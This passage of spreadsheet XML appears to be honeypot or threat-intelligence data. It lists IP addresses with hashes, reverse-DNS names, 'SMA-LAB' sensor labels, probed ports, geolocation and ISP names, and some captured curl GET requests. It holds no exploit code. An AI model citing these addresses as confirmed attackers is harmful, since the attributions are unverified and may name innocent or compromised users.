  </si>
  <si>
    <t>::ffff:dd8:f158</t>
  </si>
  <si>
    <t>d17be73707e7aa07214903c6e526aa11</t>
  </si>
  <si>
    <t>103.97.96.30</t>
  </si>
  <si>
    <t>::ffff:6761:601e</t>
  </si>
  <si>
    <t>84e581576b6d970f05bf7c6da4afc4f9</t>
  </si>
  <si>
    <t>49.213.234.221</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;80&amp;&amp;53&amp;&amp;9100&amp;&amp;1080&amp;&amp;445&amp;&amp;1521&amp;&amp;21&amp;&amp;443&amp;&amp;15847&amp;&amp;23&amp;&amp;47848&amp;&amp;NA&amp;&amp;56001</t>
  </si>
  <si>
    <t>::ffff:31d5:eadd</t>
  </si>
  <si>
    <t>0dbccfdfbcad33153a25b3d7bc985df8</t>
  </si>
  <si>
    <t>59.127.140.23</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-140-23.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>::ffff:3b7f:8c17</t>
  </si>
  <si>
    <t>fbb7b4bf6ad43a3f2b8a6930932e0d19</t>
  </si>
  <si>
    <t>49.37.128.194</t>
  </si>
  <si>
    <t>::ffff:3125:80c2</t>
  </si>
  <si>
    <t>929e5a52d0472b7af99a8d131418d5d1</t>
  </si>
  <si>
    <t>125.228.47.45</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-47-45.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_IRC_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;1433&amp;&amp;6667&amp;&amp;23&amp;&amp;38099&amp;&amp;9100&amp;&amp;61410&amp;&amp;NA&amp;&amp;6189</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:2f2d</t>
  </si>
  <si>
    <t>d1bce7da2cf763f1e3d6cc66b57ea8b8</t>
  </si>
  <si>
    <t>125.26.173.230</t>
  </si>
  <si>
    <t>NA&amp;&amp;node-ycm.pool-125-26.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>::ffff:7d1a:ade6</t>
  </si>
  <si>
    <t>5de06ec38443b4b9bbdb8ae3256666a0</t>
  </si>
  <si>
    <t>192.145.127.210</t>
  </si>
  <si>
    <t>SMA-LAB_IMAP_HC1</t>
  </si>
  <si>
    <t>143</t>
  </si>
  <si>
    <t>{Data_IMAP:NA}</t>
  </si>
  <si>
    <t>::ffff:c091:7fd2</t>
  </si>
  <si>
    <t>d4053a84e9357e75727d932062a031ef</t>
  </si>
  <si>
    <t>220.133.147.229</t>
  </si>
  <si>
    <t>220-133-147-229.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;35716&amp;&amp;9100&amp;&amp;19717</t>
  </si>
  <si>
    <t>::ffff:dc85:93e5</t>
  </si>
  <si>
    <t>b8fa7d06af05b16e5a6731ce828dfac7</t>
  </si>
  <si>
    <t>45.71.120.164</t>
  </si>
  <si>
    <t>São José do Campestre</t>
  </si>
  <si>
    <t>3388437</t>
  </si>
  <si>
    <t>-6.31556</t>
  </si>
  <si>
    <t>-35.7139</t>
  </si>
  <si>
    <t>267619</t>
  </si>
  <si>
    <t>AGRESTE TELECOMUNICAÇÕES EIRELI-ME</t>
  </si>
  <si>
    <t>::ffff:2d47:78a4</t>
  </si>
  <si>
    <t>156056a8b9da89b2935f50f2ea7d7209</t>
  </si>
  <si>
    <t>114.35.79.85</t>
  </si>
  <si>
    <t>114-35-79-85.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;19359&amp;&amp;80&amp;&amp;NA&amp;&amp;23&amp;&amp;65327&amp;&amp;63142&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:4f55</t>
  </si>
  <si>
    <t>0358606b4b53f2da40d4dd1203f48582</t>
  </si>
  <si>
    <t>125.228.185.64</t>
  </si>
  <si>
    <t>125-228-185-64.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;6530&amp;&amp;23&amp;&amp;29228&amp;&amp;42305&amp;&amp;42281&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:b940</t>
  </si>
  <si>
    <t>29819ede3ed61cdf3c109d3968de05a5</t>
  </si>
  <si>
    <t>120.56.93.56</t>
  </si>
  <si>
    <t>::ffff:7838:5d38</t>
  </si>
  <si>
    <t>ff3bc6e5987acd8f95c34d4afeec6206</t>
  </si>
  <si>
    <t>176.91.167.74</t>
  </si>
  <si>
    <t>::ffff:b05b:a74a</t>
  </si>
  <si>
    <t>3ce07f81ff2411ef67e3c4a0fe64a2a0</t>
  </si>
  <si>
    <t>82.51.54.187</t>
  </si>
  <si>
    <t>host-82-51-54-187.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>2003-08-07</t>
  </si>
  <si>
    <t>::ffff:5233:36bb</t>
  </si>
  <si>
    <t>18fd171b924ce691c223d927f23416cf</t>
  </si>
  <si>
    <t>220.133.60.228</t>
  </si>
  <si>
    <t>220-133-60-228.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;114&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:3ce4</t>
  </si>
  <si>
    <t>e1d97cc317f2a41f6342ab0f3c652710</t>
  </si>
  <si>
    <t>120.61.162.198</t>
  </si>
  <si>
    <t>::ffff:783d:a2c6</t>
  </si>
  <si>
    <t>9ce71a139ffdf2cc4b2182785ebc3542</t>
  </si>
  <si>
    <t>103.21.55.186</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_HTTP_H41&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;34056&amp;&amp;80&amp;&amp;47482&amp;&amp;1433</t>
  </si>
  <si>
    <t>Indore (Vijay Nagar)</t>
  </si>
  <si>
    <t>452010</t>
  </si>
  <si>
    <t>22.7554</t>
  </si>
  <si>
    <t>75.886</t>
  </si>
  <si>
    <t>132445</t>
  </si>
  <si>
    <t>Khetan Cable Network Pvt. Limited</t>
  </si>
  <si>
    <t>Khetan4</t>
  </si>
  <si>
    <t>2012-10-04</t>
  </si>
  <si>
    <t>KHETAN-IN</t>
  </si>
  <si>
    <t>::ffff:6715:37ba</t>
  </si>
  <si>
    <t>59c426bd06fbb6250b88635efea52dd8</t>
  </si>
  <si>
    <t>185.198.186.21</t>
  </si>
  <si>
    <t>Cadiz</t>
  </si>
  <si>
    <t>2520600</t>
  </si>
  <si>
    <t>11002</t>
  </si>
  <si>
    <t>36.5267</t>
  </si>
  <si>
    <t>-6.2891</t>
  </si>
  <si>
    <t>60987</t>
  </si>
  <si>
    <t>FIBERDAN NETWORKS, S.L</t>
  </si>
  <si>
    <t>::ffff:b9c6:ba15</t>
  </si>
  <si>
    <t>c3beae4ef5c346ebaabc2d9100e4c42c</t>
  </si>
  <si>
    <t>117.205.145.63</t>
  </si>
  <si>
    <t>::ffff:75cd:913f</t>
  </si>
  <si>
    <t>38f074bf1e84f64b858f2fff50cf5977</t>
  </si>
  <si>
    <t>118.163.142.112</t>
  </si>
  <si>
    <t>NA&amp;&amp;118-163-142-112.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;52528&amp;&amp;23&amp;&amp;20851&amp;&amp;48673&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:76a3:8e70</t>
  </si>
  <si>
    <t>8aac400dead482c87f9bcfcad33f527e</t>
  </si>
  <si>
    <t>185.74.222.175</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>44477</t>
  </si>
  <si>
    <t>STARK INDUSTRIES SOLUTIONS LTD</t>
  </si>
  <si>
    <t>Stark Industries Solutions LTD</t>
  </si>
  <si>
    <t>Adcdata Limited</t>
  </si>
  <si>
    <t>::ffff:b94a:deaf</t>
  </si>
  <si>
    <t>fa6bcc19058bf6010022970a1c4d223f</t>
  </si>
  <si>
    <t>59.95.207.133</t>
  </si>
  <si>
    <t>::ffff:3b5f:cf85</t>
  </si>
  <si>
    <t>a2f99212708e574eebc669fe59519e1b</t>
  </si>
  <si>
    <t>27.5.208.235</t>
  </si>
  <si>
    <t>::ffff:1b05:d0eb</t>
  </si>
  <si>
    <t>f4ee59ff4aaf8ed65a0516b04de2132c</t>
  </si>
  <si>
    <t>115.96.111.101</t>
  </si>
  <si>
    <t>::ffff:7360:6f65</t>
  </si>
  <si>
    <t>05eb3b655811cddcece6b2327c837bbf</t>
  </si>
  <si>
    <t>117.217.218.220</t>
  </si>
  <si>
    <t>::ffff:75d9:dadc</t>
  </si>
  <si>
    <t>2e7a16779cb1dcdeff25389ad6d84040</t>
  </si>
  <si>
    <t>117.195.213.157</t>
  </si>
  <si>
    <t>::ffff:75c3:d59d</t>
  </si>
  <si>
    <t>2cb565cfd57ee6f451e2aaade6da91a0</t>
  </si>
  <si>
    <t>59.178.252.152</t>
  </si>
  <si>
    <t>::ffff:3bb2:fc98</t>
  </si>
  <si>
    <t>07a7612254f36c388871dfaab4519c19</t>
  </si>
  <si>
    <t>123.195.177.68</t>
  </si>
  <si>
    <t>123-195-177-68.dynamic.kbronet.com.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H6&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7bc3:b144</t>
  </si>
  <si>
    <t>d00c0204a55c7067dacf34ad1a6b398b</t>
  </si>
  <si>
    <t>59.182.148.194</t>
  </si>
  <si>
    <t>::ffff:3bb6:94c2</t>
  </si>
  <si>
    <t>73757e4c2e002019548d2477b9df8ea0</t>
  </si>
  <si>
    <t>117.208.250.0</t>
  </si>
  <si>
    <t>::ffff:75d0:fa00</t>
  </si>
  <si>
    <t>255c7e9b9cc745ce1d05ae36d348cbab</t>
  </si>
  <si>
    <t>220.134.237.107</t>
  </si>
  <si>
    <t>220-134-237-107.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_PJL_H1&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_HTTPS_H1&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;1080&amp;&amp;22&amp;&amp;9100&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;5900&amp;&amp;24202&amp;&amp;23&amp;&amp;55008&amp;&amp;52671&amp;&amp;55016&amp;&amp;32949&amp;&amp;39554</t>
  </si>
  <si>
    <t>::ffff:dc86:ed6b</t>
  </si>
  <si>
    <t>1f42e027a30007ec467125dc22cfc142</t>
  </si>
  <si>
    <t>59.127.235.231</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-235-231.hinet-ip.hinet.net</t>
  </si>
  <si>
